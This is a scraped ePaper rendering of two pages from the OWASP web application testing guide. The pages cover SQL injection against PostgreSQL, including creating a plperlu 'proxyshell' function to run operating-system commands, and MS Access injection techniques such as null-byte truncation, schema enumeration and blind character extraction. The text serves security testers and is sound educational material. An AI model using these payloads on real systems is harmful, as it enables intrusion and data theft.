4.0

More documents

Recommendations

Info

128 Web Application Penetration Testing • /store.php?id=1 UNION ALL SELECT NULL, proxyshell(‘whoami’), NULL OFFSET 1;-- plperl Plperl allows us to code PostgreSQL functions in perl. Normally, it is installed as a trusted language in order to disable runtime execution of operations that interact with the underlying operating system, such as open. By doing so, it’s impossible to gain OS-level access. To successfully inject a proxyshell like function, we need to install the untrusted version from the postgres user, to avoid the so-called application mask filtering of trusted/untrusted operations. [1] Check if PL/perl-untrusted has been enabled: • SELECT count(*) FROM pg_language WHERE lanname=’plperlu’ [2] If not, assuming that sysadm has already installed the plperl package, try : • CREATE LANGUAGE plperlu [3] If either of the above succeeded, create a proxy shell function: • CREATE FUNCTION proxyshell(text) RETURNS text AS ‘open(FD,”$_[0] |”);return join(“”,);’ LANGUAGE plperlu [4] Have fun with: • SELECT proxyshell(os command); Example: [1] Create a proxy shell function: • /store.php?id=1; CREATE FUNCTION proxyshell(text) RE- TURNS text AS ‘open(FD,”$_[0] |”);return join(“”,);’ LAN- GUAGE plperlu; [2] Run an OS Command: • /store.php?id=1 UNION ALL SELECT NULL, proxyshell(‘whoami’), NULL OFFSET 1;-- References • OWASP : “Testing for SQL Injection” • OWASP : SQL Injection Prevention Cheat Sheet • PostgreSQL : “Official Documentation” - http: /www.postgresql.org/docs/ • Bernardo Damele and Daniele Bellucci: sqlmap, a blind SQL injec tion tool - http: /sqlmap.sourceforge.net Testing for MS Access Summary As explained in the generic SQL injection section, SQL injection vulnerabilities occur whenever user-supplied input is used during the construction of a SQL query without being adequately constrained or sanitized. This class of vulnerabilities allows an attacker to execute SQL code under the privileges of the user that is used to connect to the database. In this section, relevant SQL injection techniques that utilize specific features of Microsoft Access will be discussed. How to Test Fingerprinting Fingerprinting the specific database technology while testing SQL-powered application is the first step to properly asses potential vulnerabilities. A common approach involves injecting standard SQL injection attack patterns (e.g. single quote, double quote, ...) in order to trigger database exceptions. Assuming that the application does not handle exceptions with custom pages, it is possible to fingerprint the underline DBMS by observing error messages. Depending on the specific web technology used, MS Access driven applications will respond with one of the following errors: or or Fatal error: Uncaught exception ‘com_exception’ with message Source: Microsoft JET Database Engine Microsoft JET Database Engine error ‘80040e14’ Microsoft Office Access Database Engine In all cases, we have a confirmation that we’re testing an application using MS Access database. Basic Testing Unfortunately, MS Access doesn’t support typical operators that are traditionally used during SQL injection testing, including: • No comments characters • No stacked queries • No LIMIT operator • No SLEEP or BENCHMARK alike operators • and many others Nevertheless, it is possible to emulate those functions by combining multiple operators or by using alternative techniques. As mentioned, it is not possible to use the trick of inserting the characters /*, -- or # in order to truncate the query. However, we can fortunately bypass this limitation by injecting a ‘null’ character. Using a null byte %00 within a SQL query results in MS Access ignoring all remaining characters. This can be explained by considering that all strings are NULL terminated in the internal representation used by the database. It is worth mentioning that the ‘null’ character can sometimes cause troubles too as it may truncate strings at the web server level. In those situations, we can however employ another character: 0x16 (%16 in URL encoded format). Considering the following query: SELECT [username],[password] FROM users WHERE [username]=’$myUsername’ AND [password]=’$myPassword’ We can truncate the query with the following two URLs: http: /www.example.com/page.asp?user=admin’%00&- pass=foo http: /www.example.com/page.app?user=admin’%16&- pass=foo
129 Web Application Penetration Testing The LIMIT operator is not implemented in MS Access, however it is possible to limit the number of results by using the TOP or LAST operators instead. http: /www.example.com/page.app?id=2’+UNION+SE- LECT+TOP+3+name+FROM+appsTable%00 By combining both operators, it is possible to select specific results. String concatenation is possible by using & (%26) and + (%2b) characters. There are also many other functions that can be used while testing SQL injection, including but not limited to: • ASC: Obtain the ASCII value of a character passed as input • CHR: Obtain the character of the ASCII value passed as input • LEN: Return the length of the string passed as parameter • IIF: Is the IF construct, for example the following statement IIF(1=1, ‘a’, ‘b’) return ‘a’ • MID: This function allows you to extract substring, for example the following statement mid(‘abc’,1,1) return ‘a’ • TOP: This function allows you to specify the maximum number of results that the query should return from the top. For example TOP 1 will return only 1 row. • LAST: This function is used to select only the last row of a set of rows. For example the following query SELECT last(*) FROM users will return only the last row of the result. Some of these operators are essential to exploit blind SQL injections. For other advanced operators, please refer to the documents in the references. Attributes Enumeration In order to enumerate the column of a database table, it is possible to use a common error-based technique. In short, we can obtain the attributes name by analyzing error messages and repeating the query with different selectors. For example, assuming that we know the existence of a column, we can also obtain the name of the remaining attributes with the following query: ‘ GROUP BY Id%00 the following query: ‘ UNION SELECT Name FROM MSysObjects WHERE Type = 1%00 Alternatively, it is always possible to bruteforce the database schema by using a standard wordlist (e.g. FuzzDb). In some cases, developers or system administrators do not realize that including the actual .mdb file within the application webroot can allow to download the entire database. Database filenames can be inferred with the following query: http: /www.example.com/page.app?id=1’+UNION+SE- LECT+1+FROM+name.table%00 where name is the .mdb filename and table is a valid database table. In case of password protected databases, multiple software utilities can be used to crack the password. Please refer to the references. Blind SQL Injection Testing Blind SQL Injection vulnerabilities are by no means the most easily exploitable SQL injections while testing real-life applications. In case of recent versions of MS Access, it is also not feasible to execute shell commands or read/write arbitrary files. In case of blind SQL injections, the attacker can only infer the result of the query by evaluating time differences or application responses. It is supposed that the reader already knows the theory behind blind SQL injection attacks, as the remaining part of this section will focus on MS Access specific details. The following example is used: http: /www.example.com/index.php?myId=[sql] where the id parameter is used within the following query: SELECT * FROM orders WHERE [id]=$myId In the error message received, it is possible to observe the name of the next column. At this point, we can iterate the method until we obtain the name of all attributes. If we don’t know the name of the first attribute, we can still insert a fictitious column name and obtain the name of the first attribute within the error message. Obtaining Database Schema Various system tables exist by default in MS Access that can be potentially used to obtain table names and columns. Unfortunately, in the default configuration of recent MS Access database releases, these tables are not accessible. Nevertheless, it is always worth trying: • MSysObjects • MSysACEs • MSysAccessXML For example, if a union SQL injection vulnerability exists, you can use Let’s consider the myId parameter vulnerable to blind SQL injection. As an attacker, we want to extract the content of column ‘username’ in the table ‘users’, assuming that we have already disclosed the database schema. A typical query that can be used to infer the first character of the username of the 10th rows is: http: /www.example.com/index.php?id=IIF((select%20 MID(LAST(username),1,1)%20from%20(select%20TOP%20 10%20username%20from%20users))=’a’,0,’no’) If the first character is ‘a’, the query will return 0 or otherwise the string ‘no’. By using a combination of the IFF, MID, LAST and TOP functions, it is
Page 1 and 2:
1 Testing Guide 4.0 Project Leaders
Page 3 and 4:
Testing Guide Foreword - Table of c
Page 5 and 6:
3 Testing Guide Foreword - Table of
Page 7 and 8:
5 Testing Guide Foreword - By Eoin
Page 9 and 10:
7 Testing Guide Frontispiece 1 Test
Page 11 and 12:
9 Testing Guide Introduction 2 The
Page 13 and 14:
11 Testing Guide Introduction vide
Page 15 and 16:
13 Testing Guide Introduction Testi
Page 17 and 18:
15 Testing Guide Introduction laid
Page 19 and 20:
17 Testing Guide Introduction valid
Page 21 and 22:
19 Testing Guide Introduction USER
Page 23 and 24:
21 Testing Guide Introduction ment
Page 25 and 26:
23 Testing Guide Introduction offen
Page 27 and 28:
25 The OWASP Testing Framework sect
Page 29 and 30:
27 Web Application Penetration Test
Page 31 and 32:
Page 33 and 34:
Page 35 and 36:
Page 37 and 38:
Page 39 and 40:
Page 41 and 42:
Page 43 and 44:
Page 45 and 46:
Page 47 and 48:
Page 49 and 50:
Page 51 and 52:
Page 53 and 54:
Page 55 and 56:
Page 57 and 58:
Page 59 and 60:
Page 61 and 62:
Page 63 and 64:
Page 65 and 66:
Page 67 and 68:
Page 69 and 70:
Page 71 and 72:
Page 73 and 74:
Page 75 and 76:
Page 77 and 78:
Page 79 and 80: 77 Web Application Penetration Test
Page 103 and 104: 101 Web Application Penetration Tes
Page 129: 127 Web Application Penetration Tes
Page 181 and 182:
179 Web Application Penetration Tes
Page 183 and 184:
Page 185 and 186:
Page 187 and 188:
Page 189 and 190:
Page 191 and 192:
Page 193 and 194:
Page 195 and 196:
Page 197 and 198:
Page 199 and 200:
Page 201 and 202:
Page 203 and 204:
Page 205 and 206:
Page 207 and 208:
Page 209 and 210:
Page 211 and 212:
209 same code can be applied to ses
Page 213 and 214:
211 Reporting Test ID Lowest versio
Page 215 and 216:
213 Reporting Test ID Business Logi
Page 217 and 218:
215 Appendix kajfghlhfkcocafkcjlajl
Page 219 and 220:
217 Appendix Testing - http:/www.ni
Page 221 and 222:
219 Cross Site Scripting (XSS) For
Page 223 and 224:
221 LDAP Injection For details on L
show all

4.0

You also want an ePaper? Increase the reach of your titles

Delete template?

Save as template?